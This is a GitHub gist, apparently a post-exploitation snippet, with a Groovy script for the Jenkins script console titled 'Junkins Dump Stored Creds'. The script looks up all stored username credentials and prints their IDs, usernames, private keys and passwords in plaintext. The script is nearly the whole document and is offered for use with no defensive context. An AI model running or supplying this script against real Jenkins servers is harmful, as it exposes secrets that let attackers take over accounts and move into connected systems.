Skip to content

Instantly share code, notes, and snippets.

@tsundokul
Created May 19, 2022 08:14
Show Gist options
  • Save tsundokul/c0004b504416bb860283fa1ffae526c4 to your computer and use it in GitHub Desktop.
Save tsundokul/c0004b504416bb860283fa1ffae526c4 to your computer and use it in GitHub Desktop.
Junkins Dump Stored Creds
// Go to JUNKINS_URL/script
def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
com.cloudbees.plugins.credentials.common.StandardUsernameCredentials.class,
Jenkins.instance,
null,
null
);
for (c in creds) {
println( ( c.properties.privateKeySource ? "ID: " + c.id + ", UserName: " + c.username + ", Private Key: " + c.getPrivateKey() : ""))
}
for (c in creds) {
println( ( c.properties.password ? "ID: " + c.id + ", UserName: " + c.username + ", Password: " + c.password : ""))
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment